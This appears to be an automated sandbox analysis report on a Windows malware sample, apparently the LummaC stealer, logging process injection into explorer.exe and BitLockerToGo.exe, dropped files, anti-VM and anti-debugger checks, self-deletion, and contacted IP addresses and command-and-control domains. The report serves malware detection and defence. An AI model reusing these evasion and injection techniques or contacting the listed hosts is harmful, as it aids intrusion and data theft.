Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{317D06E8-5F24-433D-BDF7-79CE68D8ABC2}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\oRKal761Qm.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source:	Binary string: BitLockerToGo.pdb source: 46F6.exe, 00000008.00000002.2924154344.000000C0011D8000.00000004.00001000.00020000.00000000.sdmp, 46F6.exe, 00000008.00000003.2899832791.000002526A7A0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdb source: E9D3.exe, 00000006.00000002.2651017840.00000255FBE92000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649527966.00000255FB493000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649355650.00000255FB29A000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653495704.00000255FD29E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652400588.00000255FCA9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653034314.00000255FD094000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649016504.00000255FB092000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651510234.00000255FC298000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651715162.00000255FC49C000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2664664295.00000255FDE96000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651321782.00000255FC093000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652741478.00000255FCE9F000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652576030.00000255FCC95000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653886409.00000255FD492000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654646644.00000255FD891000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652018283.00000255FC693000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654182300.00000255FD699000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657109705.00000255FDA90000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652227130.00000255FC897000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650850655.00000255FBC9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650285185.00000255FB69D000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650650030.00000255FBA91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650458140.00000255FB899000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2648400236.00000255FAE91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657663512.00000255FDC9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ntdll.pdbUGP source: E9D3.exe, 00000006.00000002.2651017840.00000255FBE92000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649527966.00000255FB493000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649355650.00000255FB29A000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653495704.00000255FD29E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652400588.00000255FCA9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653034314.00000255FD094000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2649016504.00000255FB092000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651510234.00000255FC298000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651715162.00000255FC49C000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2664664295.00000255FDE96000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2651321782.00000255FC093000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652741478.00000255FCE9F000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652576030.00000255FCC95000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2653886409.00000255FD492000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654646644.00000255FD891000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652018283.00000255FC693000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2654182300.00000255FD699000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657109705.00000255FDA90000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2652227130.00000255FC897000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650850655.00000255FBC9E000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650285185.00000255FB69D000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650650030.00000255FBA91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2650458140.00000255FB899000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2648400236.00000255FAE91000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2657663512.00000255FDC9A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: BitLockerToGo.pdbGCTL source: 46F6.exe, 00000008.00000002.2924154344.000000C0011D8000.00000004.00001000.00020000.00000000.sdmp, 46F6.exe, 00000008.00000003.2899832791.000002526A7A0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Unpacked PE file: 0.2.oRKal761Qm.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\ssegbth	Unpacked PE file: 5.2.ssegbth.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Roaming\ssegbth

Code function: 10_2_00407585 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,

10_2_00407585

Source: E9D3.exe.1.dr

Static PE information: real checksum: 0x2008dc should be: 0x204843

Source: 46F6.exe.1.dr	Static PE information: section name: .xdata
Source: E9D3.exe.1.dr	Static PE information: section name: .xdata

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00403230 push eax; ret	0_2_00403302
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_004026FF push ecx; ret	0_2_0040270B
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_0059168F push esi; retf	0_2_005916BC
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00592766 push ecx; ret	0_2_00592772
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005CEC56 push ss; retf	0_2_005CEC69
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005CE878 push edi; retf	0_2_005CE8BD
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005D001E pushad ; retf	0_2_005D0097
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005CFFFF pushad ; retf	0_2_005D0097
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005CEC97 push ss; retf	0_2_005CEC69
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005CE8B2 push edi; retf	0_2_005CE8BD
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00403230 push eax; ret	5_2_00403302
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_004026FF push ecx; ret	5_2_0040270B
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_0069168F push esi; retf	5_2_006916BC
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00692766 push ecx; ret	5_2_00692772
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FD566 push ss; retf	5_2_006FD579
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FE92E pushad ; retf	5_2_006FE9A7
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FE90F pushad ; retf	5_2_006FE9A7
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FD1C2 push edi; retf	5_2_006FD1CD
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FD5A7 push ss; retf	5_2_006FD579
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FD188 push edi; retf	5_2_006FD1CD
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E66B4F push A900E2C5h; ret	9_2_00E66B75
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe	Code function: 9_2_00E64E96 push FFFFFFDBh; iretd	9_2_00E64E98
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00403399 push ecx; ret	10_2_004033AC

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\ssegbth	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\E9D3.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\46F6.exe	Jump to dropped file

Source: C:\Windows\explorer.exe

File created: C:\Users\user\AppData\Roaming\ssegbth

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\orkal761qm.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe

File opened: C:\Users\user\AppData\Roaming\ssegbth:Zone.Identifier read attributes | delete

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\46F6.exe

Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

Jump to behavior

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\oRKal761Qm.exe	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\Desktop\oRKal761Qm.exe	API/Special instruction interceptor: Address: 7FFE2220D584
Source: C:\Users\user\AppData\Roaming\ssegbth	API/Special instruction interceptor: Address: 7FFE2220E814
Source: C:\Users\user\AppData\Roaming\ssegbth	API/Special instruction interceptor: Address: 7FFE2220D584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: ssegbth, 00000005.00000002.2175269062.00000000006EE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOKO

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 436	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3635	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 666	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 1290	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 883	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 872	Jump to behavior

Source: C:\Users\user\AppData\Roaming\ssegbth

API coverage: 5.3 %

Source: C:\Windows\explorer.exe TID: 7624	Thread sleep count: 436 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7632	Thread sleep count: 3635 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7632	Thread sleep time: -363500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7628	Thread sleep count: 666 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7628	Thread sleep time: -66600s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7968	Thread sleep count: 273 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7976	Thread sleep count: 224 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7972	Thread sleep count: 245 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7632	Thread sleep count: 1290 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 7632	Thread sleep time: -129000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe TID: 8080	Thread sleep time: -66759s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe TID: 824	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 7548	Thread sleep time: -30000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00423920 GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423AE9h	0_2_00423920
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00423920 GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423AE9h	5_2_00423920
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00423920 GetSystemTimes followed by cmp: cmp dword ptr [0043a3ach], 0ah and CTI: jne 00423AE9h	10_2_00423920

Source: C:\Users\user\Desktop\oRKal761Qm.exe

0_2_00423920

Source: C:\Users\user\AppData\Local\Temp\E9D3.exe

Code function: 6_2_00007FF69DED4F94 GetSystemInfo,

6_2_00007FF69DED4F94

Source: explorer.exe, 00000001.00000000.1856274655.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1855756939.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000001.00000000.1855756939.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000001.00000000.1856274655.00000000098A8000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000001.00000000.1852670256.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000001.00000000.1854160723.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}%
Source: explorer.exe, 00000001.00000000.1856274655.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000001.00000000.1854160723.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000001.00000000.1855756939.0000000009815000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000001.00000000.1855756939.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.1855756939.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2647745762.00000255F93FE000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000002.2647667163.00000255F9386000.00000004.00000020.00020000.00000000.sdmp, E9D3.exe, 00000006.00000003.2632827584.00000255F93FE000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028685722.000000000328B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.3027507828.000000000328B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000001.00000000.1856274655.0000000009977000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: BitLockerToGo.exe, 00000009.00000003.3027507828.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2949677166.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000003.2981053722.00000000032B9000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000009.00000002.3028740996.00000000032B9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW,
Source: explorer.exe, 00000001.00000000.1854160723.0000000007A34000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000001.00000000.1855756939.0000000009660000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000001.00000000.1852670256.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: 46F6.exe, 00000008.00000002.2925126232.00000252450E8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: explorer.exe, 00000001.00000000.1852670256.0000000001240000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4615
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4909
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4612
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4501
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4694
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4409
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4799
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4696
Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	API call chain: ExitProcess graph end node	graph_6-4092

Source: C:\Windows\explorer.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe

Code function: 9_2_00E5DBC0 LdrInitializeThunk,

9_2_00E5DBC0

Source: C:\Users\user\AppData\Roaming\ssegbth

Code function: 10_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

10_2_00401006

Source: C:\Users\user\AppData\Roaming\ssegbth

10_2_00407585

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_0059092B mov eax, dword ptr fs:[00000030h]	0_2_0059092B
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_00590D90 mov eax, dword ptr fs:[00000030h]	0_2_00590D90
Source: C:\Users\user\Desktop\oRKal761Qm.exe	Code function: 0_2_005CD48E push dword ptr fs:[00000030h]	0_2_005CD48E
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_0069092B mov eax, dword ptr fs:[00000030h]	5_2_0069092B
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_00690D90 mov eax, dword ptr fs:[00000030h]	5_2_00690D90
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 5_2_006FBD9E push dword ptr fs:[00000030h]	5_2_006FBD9E

Source: C:\Users\user\AppData\Local\Temp\E9D3.exe	Code function: 6_2_00007FF69DDB10F8 Sleep,_initterm,_initterm,SetUnhandledExceptionFilter,	6_2_00007FF69DDB10F8
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00404464 SetUnhandledExceptionFilter,	10_2_00404464
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_0040946E __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_0040946E
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_00401006 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_00401006
Source: C:\Users\user\AppData\Roaming\ssegbth	Code function: 10_2_004024D6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_004024D6

HIPS / PFW / Operating System Protection Evasion

Benign windows process drops PE files

Source: C:\Windows\explorer.exe

File created: 46F6.exe.1.dr

Jump to dropped file

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\explorer.exe	Network Connect: 189.163.89.217 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 58.151.148.90 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 77.29.6.193 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 185.149.100.242 443	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\AppData\Local\Temp\46F6.exe

Memory allocated: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: E20000 protect: page execute and read and write

Jump to behavior

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\oRKal761Qm.exe	Thread created: C:\Windows\explorer.exe EIP: 90719D0			Jump to behavior
Source: C:\Users\user\AppData\Roaming\ssegbth	Thread created: unknown EIP: 13A19D0			Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\46F6.exe

Memory written: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe base: E20000 value starts with: 4D5A

Jump to behavior

LummaC encrypted strings found

Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: quialitsuzoxm.shop
Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: complaintsipzzx.shop
Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: languagedscie.shop
Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: mennyudosirso.shop
Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: bassizcellskz.shop
Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: deallerospfosu.shop
Source: 46F6.exe, 00000008.00000002.2923398094.000000C000CB6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: writerospzm.shop
